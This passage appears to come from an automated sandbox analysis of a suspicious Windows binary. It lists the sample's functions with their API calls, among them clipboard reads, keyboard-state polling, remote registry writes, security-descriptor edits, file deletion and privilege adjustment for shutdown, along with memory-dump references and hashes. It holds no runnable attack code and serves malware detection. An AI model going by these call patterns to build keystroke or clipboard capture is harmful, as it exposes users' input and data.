                                                                                                                                                                      • CloseClipboard.USER32 ref: 003E42CC
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 003E42E1
                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 003E42EE
                                                                                                                                                                      • GetClipboardData.USER32 ref: 003E42F6
                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 003E4303
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 003E4337
                                                                                                                                                                      • CloseClipboard.USER32 ref: 003E4447
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                      • Opcode ID: d293d24665d0d7e959f276d45c646fbe69859c73283599f784357694efe68e14
                                                                                                                                                                      • Instruction ID: 854c529bc7476e07406778782bfd4ab0193b6bc87b492df60614019779945f13
                                                                                                                                                                      • Opcode Fuzzy Hash: d293d24665d0d7e959f276d45c646fbe69859c73283599f784357694efe68e14
                                                                                                                                                                      • Instruction Fuzzy Hash: 81517175204241AFD313AB61EC85F7E77ACAF88B00F104A29F955D61E1DF74D904CB62
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DC9C7, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003DC9F8
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DCA4C
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003DCA71
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003DCA88
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 003DCAAF
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCAFB
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCB3E
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCB92
                                                                                                                                                                        • Part of subcall function 003938D8: __woutput_l.LIBCMT ref: 00393931
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCBE0
                                                                                                                                                                        • Part of subcall function 003938D8: __flsbuf.LIBCMT ref: 00393953
                                                                                                                                                                        • Part of subcall function 003938D8: __flsbuf.LIBCMT ref: 0039396B
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCC2F
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCC7E
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DCCCD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                                                                      • Opcode ID: 4e04c5910f29988dbf8993964590dfb461e47c37fd61ce0d9e9c4acade8be6b8
                                                                                                                                                                      • Instruction ID: 272ad511f4ab50bc0423c011292ab101d9e0313e1c6e729e93bba2abf988cc58
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e04c5910f29988dbf8993964590dfb461e47c37fd61ce0d9e9c4acade8be6b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 54A142B2518305AFC712EB54C885EAFB7ECFF94700F40492AF595CA191EB34DA09CB62
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DF200, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 003DF221
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF236
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF24D
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003DF25F
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 003DF279
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003DF291
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF29C
                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003DF2B8
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF2DF
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF2F6
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003DF308
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0042A5A0), ref: 003DF326
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003DF330
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF33D
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF34F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                                                                      • Opcode ID: 3badba16df5a083db870e463665aba33bf517e653a58717cf4ae248bd2df01fb
                                                                                                                                                                      • Instruction ID: 24155cb5afc7ccf832293d9f682c571fe5387d42ea1225d7980e294bdf6406b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 3badba16df5a083db870e463665aba33bf517e653a58717cf4ae248bd2df01fb
                                                                                                                                                                      • Instruction Fuzzy Hash: B831B27E6012197FDB12DBB4EC88AEE77AC9F08360F154577E805D32A0EB34DA85CA54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F0AE2, Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003F0BDE
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,003FF910,00000000,?,00000000,?,?), ref: 003F0C4C
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003F0C94
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003F0D1D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003F103D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 003F104A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                      • Opcode ID: 42fb1bf2171bc5d341cbacfa0f234ca6b544654843cca3199f2dc24deae12057
                                                                                                                                                                      • Instruction ID: a70cc9a3002bf02f901f74a37f0f1bf36f2b38b37ef64239a673b9722a3ef2e6
                                                                                                                                                                      • Opcode Fuzzy Hash: 42fb1bf2171bc5d341cbacfa0f234ca6b544654843cca3199f2dc24deae12057
                                                                                                                                                                      • Instruction Fuzzy Hash: 56025A752006119FCB16EF14C891E2AB7E9FF89724F04895DF98A9B362CB34ED41CB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DF35D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 003DF37E
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF393
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF3AA
                                                                                                                                                                        • Part of subcall function 003D45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003D45DC
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003DF3D9
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF3E4
                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003DF400
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF427
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF43E
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003DF450
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0042A5A0), ref: 003DF46E
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003DF478
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF485
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF497
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                                                                      • Opcode ID: a14f235f099559bba673613a54c76b322cc00caf2bd2f60191e25f591d727301
                                                                                                                                                                      • Instruction ID: c90093a6cd8982fd43c86f74a1374f6eadf93ef47c5832a4d7f6ada6837cc836
                                                                                                                                                                      • Opcode Fuzzy Hash: a14f235f099559bba673613a54c76b322cc00caf2bd2f60191e25f591d727301
                                                                                                                                                                      • Instruction Fuzzy Hash: B031C6765011197FCF12ABA5FCC4AEF77AC9F09324F150176EC01922A0D734DA44CA54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C81F7, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003C8766
                                                                                                                                                                        • Part of subcall function 003C874A: GetLastError.KERNEL32(?,003C822A,?,?,?), ref: 003C8770
                                                                                                                                                                        • Part of subcall function 003C874A: GetProcessHeap.KERNEL32(00000008,?,?,003C822A,?,?,?), ref: 003C877F
                                                                                                                                                                        • Part of subcall function 003C874A: HeapAlloc.KERNEL32(00000000,?,003C822A,?,?,?), ref: 003C8786
                                                                                                                                                                        • Part of subcall function 003C874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003C879D
                                                                                                                                                                        • Part of subcall function 003C87E7: GetProcessHeap.KERNEL32(00000008,003C8240,00000000,00000000,?,003C8240,?), ref: 003C87F3
                                                                                                                                                                        • Part of subcall function 003C87E7: HeapAlloc.KERNEL32(00000000,?,003C8240,?), ref: 003C87FA
                                                                                                                                                                        • Part of subcall function 003C87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003C8240,?), ref: 003C880B
                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003C825B
                                                                                                                                                                      • _memset.LIBCMT ref: 003C8270
                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003C828F
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003C82A0
                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003C82DD
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003C82F9
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003C8316
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003C8325
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 003C832C
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003C834D
                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003C8354
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003C8385
                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003C83AB
                                                                                                                                                                      • SetUserObjectSecurity.USER32 ref: 003C83BF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                      • Opcode ID: 3a7dfc1dd0218b4ba854bd26bb8bbc34bdef9cdfc07dd0dfde437b7ff79e054e
                                                                                                                                                                      • Instruction ID: 5b8e4377f00af5117b1f5eae239c2e079a2eb4bf6f62209ce80aaa1f7d177c0b
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a7dfc1dd0218b4ba854bd26bb8bbc34bdef9cdfc07dd0dfde437b7ff79e054e
                                                                                                                                                                      • Instruction Fuzzy Hash: 26612B75A0020AAFDF129F94DC84EAEBB79FF04700F148269E915E7291DB319E15CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F0665, Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003F0038,?,?), ref: 003F10BC
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003F0737
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003F07D6
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003F086E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003F0AAD
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 003F0ABA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1240663315-0
                                                                                                                                                                      • Opcode ID: 541a8692da288cce0fabeaabb002e85e07ef7cfecc898b93e8cddc1cc60fda6d
                                                                                                                                                                      • Instruction ID: 65bb81ca3febd27f86410c9ae54f62edfb96e08bf8aa600012b3667c714b1375
                                                                                                                                                                      • Opcode Fuzzy Hash: 541a8692da288cce0fabeaabb002e85e07ef7cfecc898b93e8cddc1cc60fda6d
                                                                                                                                                                      • Instruction Fuzzy Hash: 41E14D71204315AFCB16DF28C891E2ABBE9EF89714F04856DF94ADB262DB30ED05CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D0219, Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 003D0241
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003D02C2
                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003D02DD
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003D02F7
                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003D030C
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003D0324
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 003D0336
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003D034E
                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 003D0360
                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003D0378
                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003D038A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                      • Opcode ID: 6af31c3df0b18a849a5649107b8a67774551394898b7022f052cb06ecf3c1e5a
                                                                                                                                                                      • Instruction ID: 2b47dbba0057050d01df63aacf2dab7ce270c4b3611c319b5fcfda4cf8b1ac3b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6af31c3df0b18a849a5649107b8a67774551394898b7022f052cb06ecf3c1e5a
                                                                                                                                                                      • Instruction Fuzzy Hash: E941D9255047C96EFF3B8A64A8083B5BEA06F12B40F49449FD9C6573C2E7D499C8C7A2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D3A2B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003748A1,?,?,003737C0,?), ref: 003748CE
                                                                                                                                                                        • Part of subcall function 003D4CD3: GetFileAttributesW.KERNEL32(?,003D3947), ref: 003D4CD4
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003D3ADF
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003D3B87
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003D3B9A
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003D3BB7
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003D3BD9
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003D3BF5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                                                                      • Opcode ID: a26202366afd1cc4693cb0ac9de08a55c32c012e7192c051b00cf2f81f2f0631
                                                                                                                                                                      • Instruction ID: b38fb07252fecb916b25b3a3db1130d30dc426af78231c642bfc7c22b0e7426b
                                                                                                                                                                      • Opcode Fuzzy Hash: a26202366afd1cc4693cb0ac9de08a55c32c012e7192c051b00cf2f81f2f0631
                                                                                                                                                                      • Instruction Fuzzy Hash: D051923280114CAACF27EBA0DD929FDB7B8AF14300F64816AE4467B191DF356F09CB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DF65E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003DF6AB
                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 003DF6DB
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF6EF
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003DF70A
                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 003DF7A8
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DF7BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                                                                      • Opcode ID: 6946f303a72b8207fd13448a4b8164fbc69348f7b41fb175eda3b575d65d13b6
                                                                                                                                                                      • Instruction ID: e84158f783322f9cf78bd3918d675dc7a9a57807545aa790b164c065ac0d4493
                                                                                                                                                                      • Opcode Fuzzy Hash: 6946f303a72b8207fd13448a4b8164fbc69348f7b41fb175eda3b575d65d13b6
                                                                                                                                                                      • Instruction Fuzzy Hash: F441957690021AAFCF16DF64DC85AEEBBB8FF05350F144566E819A7290DB309E44CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D545F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003C8D0D
                                                                                                                                                                        • Part of subcall function 003C8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003C8D3A
                                                                                                                                                                        • Part of subcall function 003C8CC3: GetLastError.KERNEL32 ref: 003C8D47
                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 003D549B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                      • Opcode ID: 287d4ad619db58c23dfbcc53625eef5397891826a98782a80a471ad998b86e98
                                                                                                                                                                      • Instruction ID: cd7ef02b64b31fe90a2aac36154d28c6fec9294b7555388685ab9180e0b07a99
                                                                                                                                                                      • Opcode Fuzzy Hash: 287d4ad619db58c23dfbcc53625eef5397891826a98782a80a471ad998b86e98
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D014733655A112EE72B577AFC4BFBA727CEB00352F210027FC06D62C2DA900C808292
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E6596, Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
